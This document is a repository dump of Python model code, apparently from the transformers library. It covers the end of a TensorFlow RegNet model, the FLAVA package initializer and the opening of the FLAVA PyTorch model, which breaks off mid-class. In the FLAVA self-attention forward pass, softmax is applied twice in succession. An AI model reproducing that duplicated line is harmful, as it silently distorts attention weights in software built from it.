REGNET_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`tf.Tensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See
[`ConveNextImageProcessor.__call__`] for details.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare RegNet model outputting raw features without any specific head on top.",
REGNET_START_DOCSTRING,
)
class TFRegNetModel(TFRegNetPreTrainedModel):
def __init__(self, config: RegNetConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.regnet = TFRegNetMainLayer(config, name="regnet")
@unpack_inputs
@add_start_docstrings_to_model_forward(REGNET_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TFBaseModelOutputWithPoolingAndNoAttention,
config_class=_CONFIG_FOR_DOC,
modality="vision",
expected_output=_EXPECTED_OUTPUT_SHAPE,
)
def call(
self,
pixel_values: tf.Tensor,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training=False,
) -> Union[TFBaseModelOutputWithPoolingAndNoAttention, Tuple[tf.Tensor]]:
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.regnet(
pixel_values=pixel_values,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
if not return_dict:
return (outputs[0],) + outputs[1:]
return TFBaseModelOutputWithPoolingAndNoAttention(
last_hidden_state=outputs.last_hidden_state,
pooler_output=outputs.pooler_output,
hidden_states=outputs.hidden_states,
)
def serving_output(
self, output: TFBaseModelOutputWithPoolingAndNoAttention
) -> TFBaseModelOutputWithPoolingAndNoAttention:
# hidden_states not converted to Tensor with tf.convert_to_tensor as they are all of different dimensions
return TFBaseModelOutputWithPoolingAndNoAttention(
last_hidden_state=output.last_hidden_state,
pooler_output=output.pooler_output,
hidden_states=output.hidden_states,
)
@add_start_docstrings(
"""
RegNet Model with an image classification head on top (a linear layer on top of the pooled features), e.g. for
ImageNet.
""",
REGNET_START_DOCSTRING,
)
class TFRegNetForImageClassification(TFRegNetPreTrainedModel, TFSequenceClassificationLoss):
def __init__(self, config: RegNetConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.regnet = TFRegNetMainLayer(config, name="regnet")
# classification head
self.classifier = [
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(config.num_labels, name="classifier.1") if config.num_labels > 0 else tf.identity,
]
@unpack_inputs
@add_start_docstrings_to_model_forward(REGNET_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_IMAGE_CLASS_CHECKPOINT,
output_type=TFSequenceClassifierOutput,
config_class=_CONFIG_FOR_DOC,
expected_output=_IMAGE_CLASS_EXPECTED_OUTPUT,
)
def call(
self,
pixel_values: tf.Tensor = None,
labels: tf.Tensor = None,
output_hidden_states: bool = None,
return_dict: bool = None,
training=False,
) -> Union[TFSequenceClassifierOutput, Tuple[tf.Tensor]]:
r"""
labels (`tf.Tensor` of shape `(batch_size,)`, *optional*):
Labels for computing the image classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.regnet(
pixel_values, output_hidden_states=output_hidden_states, return_dict=return_dict, training=training
)
pooled_output = outputs.pooler_output if return_dict else outputs[1]
flattened_output = self.classifier[0](pooled_output)
logits = self.classifier[1](flattened_output)
loss = None if labels is None else self.hf_compute_loss(labels=labels, logits=logits)
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFSequenceClassifierOutput(loss=loss, logits=logits, hidden_states=outputs.hidden_states)
def serving_output(self, output: TFSequenceClassifierOutput) -> TFSequenceClassifierOutput:
# hidden_states not converted to Tensor with tf.convert_to_tensor as they are all of different dimensions
return TFSequenceClassifierOutput(logits=output.logits, hidden_states=output.hidden_states)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 3,030 | src/transformers/models/flava/__init__.py | # Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_torch_available, is_vision_available
_import_structure = {
"configuration_flava": [
"FLAVA_PRETRAINED_CONFIG_ARCHIVE_MAP",
"FlavaConfig",
"FlavaImageCodebookConfig",
"FlavaImageConfig",
"FlavaMultimodalConfig",
"FlavaTextConfig",
],
}
try:
if not is_vision_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["feature_extraction_flava"] = ["FlavaFeatureExtractor"]
_import_structure["image_processing_flava"] = ["FlavaImageProcessor"]
_import_structure["processing_flava"] = ["FlavaProcessor"]
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_flava"] = [
"FLAVA_PRETRAINED_MODEL_ARCHIVE_LIST",
"FlavaForPreTraining",
"FlavaImageCodebook",
"FlavaImageModel",
"FlavaModel",
"FlavaMultimodalModel",
"FlavaPreTrainedModel",
"FlavaTextModel",
]
if TYPE_CHECKING:
from .configuration_flava import (
FLAVA_PRETRAINED_CONFIG_ARCHIVE_MAP,
FlavaConfig,
FlavaImageCodebookConfig,
FlavaImageConfig,
FlavaMultimodalConfig,
FlavaTextConfig,
)
try:
if not is_vision_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .feature_extraction_flava import FlavaFeatureExtractor
from .image_processing_flava import FlavaImageProcessor
from .processing_flava import FlavaProcessor
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_flava import (
FLAVA_PRETRAINED_MODEL_ARCHIVE_LIST,
FlavaForPreTraining,
FlavaImageCodebook,
FlavaImageModel,
FlavaModel,
FlavaMultimodalModel,
FlavaPreTrainedModel,
FlavaTextModel,
)
else:
import sys
sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 96,517 | src/transformers/models/flava/modeling_flava.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch FLAVA model."""
import collections
import math
from collections import OrderedDict
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Set, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from ...activations import ACT2FN
from ...modeling_outputs import BaseModelOutput, BaseModelOutputWithPooling
from ...modeling_utils import PreTrainedModel, find_pruneable_heads_and_indices, prune_linear_layer
from ...utils import (
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_flava import (
FlavaConfig,
FlavaImageCodebookConfig,
FlavaImageConfig,
FlavaMultimodalConfig,
FlavaTextConfig,
)
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "facebook/flava-full"
# Codebook docstring
_CHECKPOINT_FOR_CODEBOOK_DOC = "facebook/flava-image-codebook"
_CONFIG_CLASS_FOR_IMAGE_MODEL_DOC = "FlavaImageConfig"
_CONFIG_CLASS_FOR_TEXT_MODEL_DOC = "FlavaTextConfig"
_CONFIG_CLASS_FOR_MULTIMODAL_MODEL_DOC = "FlavaMultimodalConfig"
_EXPECTED_IMAGE_OUTPUT_SHAPE = [1, 197, 768]
FLAVA_PRETRAINED_MODEL_ARCHIVE_LIST = [
"facebook/flava-full",
# See all flava models at https://huggingface.co/models?filter=flava
]
FLAVA_CODEBOOK_PRETRAINED_MODEL_ARCHIVE_LIST = ["facebook/flava-image-codebook"]
LOGIT_SCALE_CLAMP_MIN = 0
LOGIT_SCALE_CLAMP_MAX = 4.6052
FlavaPossibleConfigs = Union[FlavaTextConfig, FlavaImageConfig, FlavaMultimodalConfig]
@dataclass
class FlavaModelOutput(ModelOutput):
"""
Output from FlavaModel containing embeddings and outputs from individual encoders.
Note that `image_embeddings` and `text_embeddigns` returned are similar to pooled output returned from a
transformer. If you want embeddings for contrastive loss or retrieval use a FLAVA model's `image_projection` and
`text_projection` layers on `image_embeddings` and `text_embeddings` respectively.
Args:
image_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `pixel_values` are present):
The image embeddings which are basically the pooled output of [`FlavaImageModel`].
image_output (`BaseModelOutputWithPooling`, *optional*, returned when `pixel_values` are present):
The output of the [`FlavaImageModel`].
text_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids` are present):
The text embeddings which are basically the pooled output of [`FlavaTextModel`].
text_output (`BaseModelOutputWithPooling`, *optional*, returned when `input_ids` are present):
The output of the [`FlavaTextModel`].
multimodal_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids` and `pixel_values` are present and `skip_multimodal_encoder` is `None` or `False`):
The multimodal embeddings which are basically the pooled output of [`FlavaTextModel`].
multimodal_output (`BaseModelOutputWithPooling`, returned when `input_ids` and `pixel_values` are present and `skip_multimodal_encoder` is `None` or `False`):
The output of the [`FlavaMultimodalModel`].
"""
image_embeddings: Optional[torch.FloatTensor] = None
image_output: Optional[BaseModelOutputWithPooling] = None
text_embeddings: Optional[torch.FloatTensor] = None
text_output: Optional[BaseModelOutputWithPooling] = None
multimodal_embeddings: Optional[torch.FloatTensor] = None
multimodal_output: Optional[BaseModelOutputWithPooling] = None
def to_tuple(self) -> Tuple[Any]:
return tuple(
self[k] if k not in ["text_output", "image_output", "multimodal_output"] else getattr(self, k).to_tuple()
for k in self.keys()
)
@dataclass
class FlavaLosses(ModelOutput):
"""Class representing pretraining losses from FLAVA model
Args:
mim (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `mim_labels` and `pixel_values` are present, `input_ids_masked` is absent and `mim_weight` > 0.:
Masked Image Modeling loss as used in BeIT calculated only for unimodal image data.
mlm (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `mlm_labels` and `input_ids_masked` are present, `pixel_values` is absent and `mlm_weight` > 0.:
Masked Language Modeling loss as used in BERT calculated only for unimodal text data.
itm (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `itm_labels`, `input_ids_masked`, `pixel_values` are present and `itm_weight` > 0.:
Image Text Matching (ITM) loss calculated for paired image-text data. Note that ITM loss is calculated on
masked pairs in FLAVA.
global_contrastive (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `input_ids` and `pixel_values` are present and `global_contrastive_weight` > 0.:
Contrastive loss for image-text similarity similar to CLIP but calculated globally for paired image-text
data. This is calculated on unmasked images and texts.
mmm_image (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `mim_labels`, `pixel_values` and `input_ids_masked` are present and `mmm_image_weight` > 0.:
Masked Multimodal Modeling loss's image component calculated on paired image-text data.
mmm_text (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `mlm_labels`, `pixel_values` and `input_ids_masked` are present and `mmm_text_weight` > 0.:
Masked Multimodal Modeling loss's text component calculated on paired image-text data.
"""
mim: Optional[torch.FloatTensor] = None
mlm: Optional[torch.FloatTensor] = None
itm: Optional[torch.FloatTensor] = None
global_contrastive: Optional[torch.FloatTensor] = None
mmm_image: Optional[torch.FloatTensor] = None
mmm_text: Optional[torch.FloatTensor] = None
def all_none(self) -> bool:
all_none = True
for v in self.values():
if v is not None:
all_none = False
break
return all_none
@dataclass
class FlavaForPreTrainingOutput(ModelOutput):
"""
Output from FlavaForPreTraining containing embeddings, and outputs from individual encoders.
Note that `image_embeddings` and `text_embeddings` returned are similar to pooled output returned from a
transformer. If you want embeddings for contrastive loss or retrieval use a FLAVA model's `image_projection` and
`text_projection` layers on `image_embeddings` and `text_embeddings` respectively.
Args:
loss (`torch.FloatTensor`, *optional*, returned when `return_loss` is True):
Total loss calculated for this model.
loss_info (`FlavaLosses`):
Detailed info for FLAVA Pretraining losses. Check `FlavaLosses` class description for the information on
the keys.
image_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `pixel_values` are present):
The image embeddings which are basically the pooled output of [`FlavaImageModel`].
image_output (`BaseModelOutputWithPooling`, *optional*, returned when `pixel_values` are present):
The output of the [`FlavaImageModel`].
text_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids` are present):
The text embeddings which are basically the pooled output of [`FlavaTextModel`].
text_output (`BaseModelOutputWithPooling`, *optional*, returned when `input_ids` are present):
The output of the [`FlavaTextModel`].
multimodal_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids` and `pixel_values` are present and `skip_unmasked_multimodal_encoder` is `None` or `False`):
The multimodal embeddings which are basically the pooled output of [`FlavaTextModel`].
multimodal_output (`BaseModelOutputWithPooling`, returned when `input_ids` and `pixel_values` are present and `skip_unmasked_multimodal_encoder` is `None` or `False`):
The output of the [`FlavaMultimodalModel`].
image_masked_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `pixel_values` are present):
The image embeddings which are basically the pooled output of [`FlavaImageModel`]. Uses `bool_masked_pos`
to create masked images.
image_masked_output (`BaseModelOutputWithPooling`, *optional*, returned when `pixel_values` are present):
The output of the [`FlavaImageModel`]. Uses `bool_masked_pos` to create masked images.
text_masked_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids_masked` are present):
The text embeddings which are basically the pooled output of [`FlavaTextModel`].
text_masked_output (`BaseModelOutputWithPooling`, *optional*, returned when `input_ids_masked` are present):
The output of the [`FlavaTextModel`].
multimodal_masked_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids` and `pixel_values` are present):
The multimodal embeddings which are basically the pooled output of [`FlavaTextModel`].
multimodal_masked_output (`BaseModelOutputWithPooling`, returned when `input_ids_masked` and `pixel_values` are present):
The output of the [`FlavaMultimodalModel`].
mim_logits (`torch.FloatTensor` of shape `(batch_size, num_image_patches, image_vocab_size)` or of shape `(total_masked_patches, image_vocab_size)` , *optional*, returned when `pixel_values` are present and `input_ids_masked` are not):
The logits for MIM unimodal loss. Uses `book_masked_pos` to get masked patches. The flattened output is
returned when `bool_masked_pos` has some of the patches masked.
mlm_logits (`torch.FloatTensor` of shape `(batch_size, text_seq_length, text_vocab_size)` or of shape `(total_masked_seq_length, text_vocab_size)`, *optional*, returned when `input_ids_masked` are present and `pixel_values` are not):
The logits for MLM unimodal loss. The flattened output is returned when `input_ids_masked` has some of
the tokens masked.
itm_logits (`torch.FloatTensor` of shape `(batch_size, 2)`, *optional*, returned when `input_ids_masked` and `pixel_values` are present):
The logits for ITM loss. Note that ITM loss is calculated on masked pairs in FLAVA.
mmm_image_logits (`torch.FloatTensor` of shape `(batch_size, num_image_patches, image_vocab_size)` or of shape`(total_masked_patches, image_vocab_size)`, *optional*, returned when `pixel_values` and `input_ids_masked` are present):
The logits for MMM image multimodal loss. Uses `book_masked_pos` to get masked patches. The flattened
output is returned when `bool_masked_pos` has some of the patches masked.
mmm_text_logits (`torch.FloatTensor` of shape `(batch_size, text_seq_length, text_vocab_size)` or of shape `(`(total_masked_seq_length, text_vocab_size)`), *optional*, returned when `pixel_values` and `input_ids_masked` are present):
The logits for MMM text multimodal loss. The flattened output is returned when `input_ids_masked` has
some of the tokens masked.
contrastive_logits_per_image (`torch.FloatTensor` of shape `(image_batch_size, text_batch_size)`):
The scaled dot product scores between `image_embeddings` and `text_embeddings` but passed through FLAVA's
`image_projection` and `text_projection` layers respectively. This represents the image-text similarity
scores. This is calculated on unmasked images and texts.
contrastive_logits_per_text (`torch.FloatTensor` of shape `(text_batch_size, image_batch_size)`):
The scaled dot product scores between `text_embeddings` and `image_embeddings` but passed through FLAVA's
`text_projection` and `image_projection` layers respectively. This is calculated on unmasked images and
texts.
"""
loss: Optional[torch.FloatTensor] = None
loss_info: FlavaLosses = None
image_embeddings: Optional[torch.FloatTensor] = None
image_output: Optional[BaseModelOutputWithPooling] = None
text_embeddings: Optional[torch.FloatTensor] = None
text_output: Optional[BaseModelOutputWithPooling] = None
multimodal_embeddings: Optional[torch.FloatTensor] = None
multimodal_output: Optional[BaseModelOutputWithPooling] = None
image_masked_embeddings: Optional[torch.FloatTensor] = None
image_masked_output: Optional[BaseModelOutputWithPooling] = None
text_masked_embeddings: Optional[torch.FloatTensor] = None
text_masked_output: Optional[BaseModelOutputWithPooling] = None
multimodal_masked_embeddings: Optional[torch.FloatTensor] = None
multimodal_masked_output: Optional[BaseModelOutputWithPooling] = None
mim_logits: Optional[torch.FloatTensor] = None
mlm_logits: Optional[torch.FloatTensor] = None
itm_logits: Optional[torch.FloatTensor] = None
contrastive_logits_per_image: Optional[torch.FloatTensor] = None
contrastive_logits_per_text: Optional[torch.FloatTensor] = None
mmm_image_logits: Optional[torch.FloatTensor] = None
mmm_text_logits: Optional[torch.FloatTensor] = None
def to_tuple(self) -> Tuple[Any]:
transformer_outputs = [
"text_output",
"image_output",
"multimodal_output",
"text_masked_output",
"image_masked_output",
"multimodal_masked_output",
]
return tuple(self[k] if k not in transformer_outputs else getattr(self, k).to_tuple() for k in self.keys())
# Based on timm implementation, which can be found here:
# https://github.com/rwightman/pytorch-image-models/blob/master/timm/models/image_transformer.py
class FlavaImageEmbeddings(nn.Module):
"""
Construct the CLS token, position and patch embeddings. Optionally, also the mask token.
"""
def __init__(self, config: FlavaImageConfig, use_mask_token: bool = False) -> None:
super().__init__()
use_mask_token = use_mask_token or config.mask_token
self.cls_token = nn.Parameter(torch.zeros(1, 1, config.hidden_size))
self.mask_token = nn.Parameter(torch.zeros(1, 1, config.hidden_size)) if use_mask_token else None
self.patch_embeddings = PatchEmbeddings(
image_size=config.image_size,
patch_size=config.patch_size,
num_channels=config.num_channels,
embed_dim=config.hidden_size,
)
num_patches = self.patch_embeddings.num_patches
self.position_embeddings = nn.Parameter(torch.zeros(1, num_patches + 1, config.hidden_size))
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.config = config
def interpolate_pos_encoding(self, embeddings: torch.Tensor, height: int, width: int) -> torch.Tensor:
"""
This method allows to interpolate the pre-trained position encodings, to be able to use the model on higher
resolution images.
Source:
https://github.com/facebookresearch/dino/blob/de9ee3df6cf39fac952ab558447af1fa1365362a/image_transformer.py#L174
"""
npatch = embeddings.shape[1] - 1
num_pos = self.position_embeddings.shape[1] - 1
if npatch == num_pos and height == width:
return self.position_embeddings
class_pos_embed = self.position_embeddings[:, 0]
patch_pos_embed = self.position_embeddings[:, 1:]
dim = embeddings.shape[-1]
num_h_patches = height // self.config.patch_size
num_w_patches = width // self.config.patch_size
# we add a small number to avoid floating point error in the interpolation
# see discussion at https://github.com/facebookresearch/dino/issues/8
num_h_patches, num_w_patches = num_h_patches + 0.1, num_w_patches + 0.1
patch_pos_embed = nn.functional.interpolate(
patch_pos_embed.reshape(1, int(math.sqrt(num_pos)), int(math.sqrt(num_pos)), dim).permute(0, 3, 1, 2),
scale_factor=(num_h_patches / math.sqrt(num_pos), num_w_patches / math.sqrt(num_pos)),
mode="bicubic",
align_corners=False,
)
if int(num_h_patches) != patch_pos_embed.shape[-2] or int(num_w_patches) != patch_pos_embed.shape[-1]:
raise ValueError(
f"Number of patches for images ({int(num_h_patches), int(num_w_patches)}) don't match the "
f"shape of position embedding ({patch_pos_embed.shape[-2], patch_pos_embed.shape[-1]})"
)
patch_pos_embed = patch_pos_embed.permute(0, 2, 3, 1).view(1, -1, dim)
return torch.cat((class_pos_embed.unsqueeze(0), patch_pos_embed), dim=1)
def forward(
self,
pixel_values: torch.Tensor,
bool_masked_pos: Optional[torch.BoolTensor] = None,
interpolate_pos_encoding: bool = False,
) -> torch.Tensor:
batch_size, num_channels, height, width = pixel_values.shape
embeddings = self.patch_embeddings(pixel_values, interpolate_pos_encoding=interpolate_pos_encoding)
batch_size, seq_len, _ = embeddings.size()
if bool_masked_pos is not None:
mask_tokens = self.mask_token.expand(batch_size, seq_len, -1)
# B X H X W = B X HW
if bool_masked_pos.dim() == 3:
bool_masked_pos = bool_masked_pos.view(bool_masked_pos.size(0), -1)
# replace the masked visual tokens by mask_tokens
mask = bool_masked_pos.unsqueeze(-1).type_as(mask_tokens)
embeddings = embeddings * (1.0 - mask) + mask_tokens * mask
# add the [CLS] token to the embedded patch tokens
cls_tokens = self.cls_token.expand(batch_size, -1, -1)
embeddings = torch.cat((cls_tokens, embeddings), dim=1)
# add positional encoding to each token
if interpolate_pos_encoding:
embeddings = embeddings + self.interpolate_pos_encoding(embeddings, height, width)
else:
embeddings = embeddings + self.position_embeddings
embeddings = self.dropout(embeddings)
return embeddings
# Based on timm implementation, which can be found here:
# https://github.com/rwightman/pytorch-image-models/blob/master/timm/models/image_transformer.py
class PatchEmbeddings(nn.Module):
"""
Image to Patch Embedding.
"""
def __init__(
self,
image_size: int = 224,
patch_size: Union[int, Tuple[int, int]] = 16,
num_channels: int = 3,
embed_dim: int = 768,
):
super().__init__()
if not isinstance(image_size, collections.abc.Iterable):
image_size = (image_size, image_size)
if not isinstance(patch_size, collections.abc.Iterable):
patch_size = (patch_size, patch_size)
num_patches = (image_size[1] // patch_size[1]) * (image_size[0] // patch_size[0])
self.image_size = image_size
self.patch_size = patch_size
self.num_patches = num_patches
self.projection = nn.Conv2d(num_channels, embed_dim, kernel_size=patch_size, stride=patch_size)
def forward(self, pixel_values: torch.Tensor, interpolate_pos_encoding: bool = False) -> torch.Tensor:
batch_size, num_channels, height, width = pixel_values.shape
if not interpolate_pos_encoding:
if height != self.image_size[0] or width != self.image_size[1]:
raise ValueError(
f"Input image size ({height}*{width}) doesn't match model"
f" ({self.image_size[0]}*{self.image_size[1]})."
)
x = self.projection(pixel_values).flatten(2).transpose(1, 2)
return x
class FlavaTextEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings."""
def __init__(self, config):
super().__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
# position_ids (1, len position emb) is contiguous in memory and exported when serialized
self.position_embedding_type = getattr(config, "position_embedding_type", "absolute")
self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
self.register_buffer(
"token_type_ids", torch.zeros(self.position_ids.size(), dtype=torch.long), persistent=False
)
def forward(
self,
input_ids: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
position_ids: Optional[torch.Tensor] = None,
):
input_shape = input_ids.size()
seq_length = input_shape[1]
if position_ids is None:
position_ids = self.position_ids[:, :seq_length]
# Setting the token_type_ids to the registered buffer in constructor where it is all zeros, which usually occurs
# when its auto-generated, registered buffer helps users when tracing the model without passing token_type_ids, solves
# issue #5664
if token_type_ids is None:
if hasattr(self, "token_type_ids"):
buffered_token_type_ids = self.token_type_ids[:, :seq_length]
buffered_token_type_ids_expanded = buffered_token_type_ids.expand(input_shape[0], seq_length)
token_type_ids = buffered_token_type_ids_expanded
else:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
inputs_embeds = self.word_embeddings(input_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + token_type_embeddings
if self.position_embedding_type == "absolute":
position_embeddings = self.position_embeddings(position_ids)
embeddings += position_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
class FlavaSelfAttention(nn.Module):
def __init__(self, config: FlavaPossibleConfigs) -> None:
super().__init__()
if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
raise ValueError(
f"The hidden size {config.hidden_size,} is not a multiple of the number of attention "
f"heads {config.num_attention_heads}."
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
self.key = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
self.value = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
def transpose_for_scores(self, x: torch.Tensor) -> torch.Tensor:
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
mixed_query_layer = self.query(hidden_states)
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
query_layer = self.transpose_for_scores(mixed_query_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in BertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.functional.softmax(attention_scores, dim=-1)
# Normalize the attention scores to probabilities.
attention_probs = nn.functional.softmax(attention_scores, dim=-1)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
class FlavaSelfOutput(nn.Module):
"""
The residual connection is defined in FlavaLayer (same as ViTLayer) instead of here (as is the case with other
models), due to the layernorm applied before each block.
"""
def __init__(self, config: FlavaPossibleConfigs) -> None:
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
class FlavaAttention(nn.Module):
def __init__(self, config: FlavaPossibleConfigs) -> None:
super().__init__()
self.attention = FlavaSelfAttention(config)
self.output = FlavaSelfOutput(config)
self.pruned_heads = set()
def prune_heads(self, heads: Set[int]) -> None:
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(
heads, self.attention.num_attention_heads, self.attention.attention_head_size, self.pruned_heads
)
# Prune linear layers
self.attention.query = prune_linear_layer(self.attention.query, index)
self.attention.key = prune_linear_layer(self.attention.key, index)
self.attention.value = prune_linear_layer(self.attention.value, index)
self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
# Update hyper params and store pruned heads
self.attention.num_attention_heads = self.attention.num_attention_heads - len(heads)
self.attention.all_head_size = self.attention.attention_head_size * self.attention.num_attention_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
self_outputs = self.attention(
hidden_states, attention_mask=attention_mask, head_mask=head_mask, output_attentions=output_attentions
)
attention_output = self.output(self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
class FlavaIntermediate(nn.Module):
def __init__(self, config: FlavaPossibleConfigs) -> None:
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
# Copied from transformers.models.vit.modeling_vit.ViTIntermediate.forward
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
class FlavaOutput(nn.Module):
def __init__(self, config: FlavaPossibleConfigs) -> None:
